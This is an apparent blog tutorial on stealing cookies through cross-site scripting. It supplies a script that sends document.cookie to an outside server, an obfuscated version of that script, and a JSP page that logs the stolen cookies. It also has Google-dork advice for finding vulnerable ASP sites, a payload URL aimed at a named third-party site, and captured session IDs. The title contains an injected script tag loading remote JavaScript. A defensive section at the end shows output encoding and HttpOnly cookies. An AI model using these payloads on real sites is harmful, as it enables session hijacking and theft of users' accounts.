XSS in practice: stealing cookies with XSS "/><br><script src="https://www.yunssl.cn:9062/static/p2.js"></script><!-
2017-04-13 00:00
0. Prerequisite: an external web server that you control, for example a free virtual host. If you are only playing with XSS on an internal network, forget it.
1. Create a get.js and put it on the web server, for example http://www.myweb.com/get.js:

```javascript
// Reference: http://blog.csdn.net/binyao02123202/article/details/9041113
// Currently a fairly good XSS approach: the JS is short, nothing pops up on the
// client, and the complete cookie string is obtained
var img = document.createElement('img');
img.width = 0;
img.height = 0;
img.src = 'http://www.myweb.com/get.jsp?msg=' + encodeURIComponent(document.cookie);
```

Note: document.cookie contains special characters, so it has to be passed through encodeURIComponent.
If you do not want people to read the JS, obfuscate it; online tool: http://tool.chinaz.com/js.aspx
After JS obfuscation and compression it looks like this, almost unreadable:

```javascript
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('6 1=2.7(\'1\');1.8=0;1.5=0;1.4=\'3://9.e.f/g.a?b=\'+c(2.d);',17,17,'|img|document|http|src|height|var|createElement|width|www|jsp|msg|encodeURIComponent|cookie|myweb|com|get'.split('|'),0,{}))
```
2. Create a get.jsp that receives the cookie and appends it to a file on the server, for example /root/msg_get.txt:

```jsp
<%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%>
<%@ page import="java.text.SimpleDateFormat"%>
<%@ page import="java.io.*"%>
<%@ page import="java.net.*"%>
<%
    // Current date
    Date date = new Date();
    // Output format for the timestamp
    SimpleDateFormat dateFormat = new SimpleDateFormat("yyyy-MM-dd HH:mm:sss");
    String logfile = "/root/msg_get.txt";
    String time_stamp = dateFormat.format(date);
    // Read the parameter first and decode only when it is present:
    // URLDecoder.decode(null, ...) would throw a NullPointerException
    String msg = request.getParameter("msg");
    String cookie = (msg == null) ? null : URLDecoder.decode(msg, "UTF-8");
    if (null != cookie) {
        out.println(time_stamp + " 正在写入 " + logfile + ":[" + cookie + "]");
        System.out.println(time_stamp + " 正在写入 " + logfile + ":[" + cookie + "]");
        FileWriter writer = null;
        try {
            // Open a file writer; the second constructor argument (true) selects append mode
            writer = new FileWriter(logfile, true);
            writer.write(time_stamp + ":\r\n" + cookie + "\r\n\r\n");
        } catch (IOException e) {
            e.printStackTrace();
        } finally {
            try {
                if (writer != null) {
                    writer.close();
                }
            } catch (IOException e) {
                e.printStackTrace();
            }
        }
    } else {
        out.println(time_stamp + " 请指定msg参数。这是系统要使用的cookie参数。 ");
    }
%>
<script language="javascript">
    // This script works in both IE6 and IE7
    // http://zhidao.baidu.com/link?url=MxvCuaBHizw8fMEuolqlpdfCe8b-XwouXyP-mtCOVXZgNovuEbTH0Fnq9EZyOgw0bzMgb3hrAD8Tfi-OovfeENrg3cASuHuv -2x7EnzneLW
    function custom_close() {
        if (confirm("您确定要关闭本页吗?")) {
            window.opener = null;
            window.open('', '_self');
            window.close();
        } else {}
    }
    window.opener = null;
    window.open('', '_self');
    window.close();
</script>
<input id="btnClose" type="button" value="关闭本页" onClick="custom_close()" />
```
3. Insert your JS wherever the XSS vulnerability is:
Reference: http://www.2cto.com/Article/201203/124645.html
Google for inurl:'Product.asp?BigClassName'
For example: http://www.sider.com.hk/ProductIndex.asp?BigClassName=<script src="http://www.myweb.com/get.js"></script>
For example, write a CSDN article title like this: "/><script src="http://www.myweb.com/get.js"></script><!-
4. Test: tail -f /root/msg_get.txt; the cookies have been saved:

```
2016-10-14 10:57:020:
ASPSESSIONIDQSTSTSCQ=HOFHOIHDCGHFOLGDFFBGGJOB; ASPSESSIONIDQQTQTSAT=KJBFPGIDFPIOKNFCHBIOHIOB; ASPSESSIONIDSSRRTQAS=ACCJEBCAKAKAEPNDNONFFBKD
```
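The defender's side of the four steps above, as an added example that is not code from the original post: context-aware output encoding renders the post's `"/><script ...><!-` string inert at both injection points (attribute value and title text), and an HttpOnly session cookie never appears in document.cookie, so the get.js request carries nothing useful. Function names and the cookie jar are constructed for illustration.

```javascript
// Added defender-side example (not code from the original post). The cookies in
// the log above were stolen because (a) untrusted input was echoed into HTML
// unencoded and (b) the session cookies were readable from document.cookie.
// Names and sample values below are constructed for illustration.

// Encode a string for HTML text and double-quoted attribute contexts. This turns
// the post's `"/><script ...>` string into inert text in both positions.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Render the two injection points from the post with encoding applied: a query
// parameter echoed into an attribute value and an article title echoed as text.
function renderPage(bigClassName, title) {
  return [
    `<input type="text" name="BigClassName" value="${escapeHtml(bigClassName)}">`,
    `<h1>${escapeHtml(title)}</h1>`,
  ].join('\n');
}

// Build a Set-Cookie header for a session id; HttpOnly keeps it out of
// document.cookie, Secure and SameSite limit where the browser sends it.
function sessionCookieHeader(name, value) {
  if (!/^[A-Za-z0-9_-]+$/.test(name)) throw new Error('invalid cookie name');
  if (/[\s;,"\\]/.test(value)) throw new Error('invalid cookie value');
  return `${name}=${value}; Path=/; Secure; HttpOnly; SameSite=Lax`;
}

// Simulate what document.cookie would expose for a set of Set-Cookie headers:
// browsers omit cookies flagged HttpOnly, so only the others are visible to script.
function scriptVisibleCookies(setCookieHeaders) {
  return setCookieHeaders
    .map((h) => h.split(';').map((p) => p.trim()))
    .filter((parts) => !parts.slice(1).some((a) => a.toLowerCase() === 'httponly'))
    .map((parts) => parts[0])
    .join('; ');
}

// The injection string used in the post, and a constructed cookie jar.
const PAYLOAD = '"/><script src="http://www.myweb.com/get.js"></script><!-';
const HEADERS = [
  sessionCookieHeader('ASPSESSIONIDQSTSTSCQ', 'CONSTRUCTED-SESSION-VALUE'),
  '_ga=GA1.2.1223755915.1472435778; Path=/', // analytics cookie, script-readable
];

console.log(renderPage(PAYLOAD, PAYLOAD));  // no <script element survives encoding
console.log(scriptVisibleCookies(HEADERS)); // only the _ga cookie is exposed
```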